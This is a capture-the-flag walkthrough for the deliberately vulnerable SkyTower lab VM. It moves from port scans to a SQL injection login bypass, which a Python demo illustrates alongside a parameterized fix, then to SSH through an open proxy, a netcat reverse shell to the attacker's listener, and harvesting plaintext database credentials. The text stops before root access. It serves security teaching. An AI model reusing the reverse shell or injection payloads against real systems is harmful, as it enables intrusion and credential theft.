Code name: SkyTower
VM Download: http://download.vulnhub.com/skytower/SkyTower.zip
Challenge: Get root on the system
Right after locating the victim box on the network, we start by scanning it with nmap (all ports, with service and OS detection):
# nmap -Pn -p- -A 192.168.11.5
We find port 80 open, and browsing to it shows a simple login form.
As always, we can try to dig deeper with nikto:
# nikto -h http://192.168.11.5
Nothing special found. The next step is to test the web app itself: it is written in PHP, and a login form almost certainly has a database behind it, so SQL injection is the first thing to try.
sqlmap seems to have found something interesting...
Oh... that failed. Well, you know what they say: 60% of the time, it works every time.
But we can still try to bypass the login by hand!
Common ways to bypass a PHP login form use characters such as ' # || " ; to break out of the quoted string in the SQL query and append a boolean expression that is always true (for example ' OR 1=1 # in MySQL, where # comments out the rest of the query). If the form blacklists some of these, try the alternatives until one gets through.
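To make the bypass concrete, here is an added example (not code from the SkyTower VM or the original post) that models a PHP-style login query in Python with an in-memory SQLite table. The table contents, the user alice@example.org and the password s3cret are constructed for the example. It builds the query the way a vulnerable app does, shows two payloads that log in without knowing the password, and contrasts it with a parameterized query that the same payloads cannot bypass. SQLite uses -- as its comment marker where MySQL would accept #, and SQLite's || is string concatenation rather than OR, so the payloads are written in the form that works on both engines.

```python
import sqlite3


def make_db():
    """Constructed sample database: one user row, plaintext password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (email TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('alice@example.org', 's3cret')")
    conn.commit()
    return conn


def build_vulnerable_query(email, password):
    """The bug: user input is pasted straight into the SQL string,
    exactly like "... WHERE email='$email' AND password='$pass'" in PHP."""
    return ("SELECT email FROM login WHERE email = '%s' AND password = '%s'"
            % (email, password))


def vulnerable_login(conn, email, password):
    """Returns the logged-in email, or None if the query matched nothing."""
    row = conn.execute(build_vulnerable_query(email, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, email, password):
    """Hardened form: placeholders keep the input as data, never as SQL."""
    row = conn.execute(
        "SELECT email FROM login WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Payload 1: close the quote, OR in a true condition, comment out the rest.
    # In MySQL the trailing comment would be written with # instead of --.
    print(build_vulnerable_query("' OR 1=1 -- ", "x"))
    print(vulnerable_login(db, "' OR 1=1 -- ", "x"))      # alice@example.org
    # Payload 2: inject in the password field; AND binds tighter than OR,
    # so the row matches through the OR branch.
    print(vulnerable_login(db, "nobody", "' OR '1'='1"))  # alice@example.org
    # The same payloads against the parameterized query fail.
    print(safe_login(db, "' OR 1=1 -- ", "x"))            # None
    print(safe_login(db, "alice@example.org", "s3cret"))  # alice@example.org
```

Run it and compare the printed query against the first payload: the injected -- turns the password check into a comment, which is exactly what the # variant does on MySQL.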
Nice, we are in, and the page hands us an SSH user:password. Let's test it.
That did not work. As the nmap scan showed, the SSH port is filtered, so we cannot reach it directly.
Time to think outside the box: SSH is filtered, but the same host runs an open proxy (nmap reported it). We can route our SSH connection through that proxy with proxychains and see what happens.
We configure proxychains to use the new proxy by editing /etc/proxychains.conf and adding the proxy under the [ProxyList] section, as a line of the form `http <proxy-ip> <proxy-port>` (here the victim's address and the proxy port nmap reported).
Nice, that worked, but... we are not in?
For some reason the connection is killed right after login. We can still run a single command over ssh, though, so we work around it with netcat. First, start a listener on our box:
# nc -lvp 8899
Then run a reverse shell one-liner on the victim through ssh (the command is executed remotely without opening an interactive session):
# proxychains ssh john@192.168.11.5 nc 192.168.11.12 8899 -e /bin/bash
Nice, we are in! What now? Gather more information. We saw a web app earlier, and PHP apps that talk to a database commonly keep the database credentials in plaintext inside their .php configuration files.
And that is exactly what we find: database credentials, which we can use to log into the MySQL server and dig further.
At this point the raw netcat shell is not a proper terminal, which makes the interactive mysql client awkward to use. We can move to a real SSH session instead by removing /home/john/.bashrc, which contains the code that kills our connection right after login, and then logging in again over ssh. (Renaming the file with mv instead of deleting it lets you restore it afterwards.)
# rm /home/john/.bashrc
Once that is done, we can log into the MySQL server with
$ mysql -u root -p
using the credentials we just recovered from the PHP files.
From there we browse the database for more data.
Nice, more user:password pairs found.
We can now try these accounts on the system itself and check whether any of them can sudo to root.
And after a few attempts.....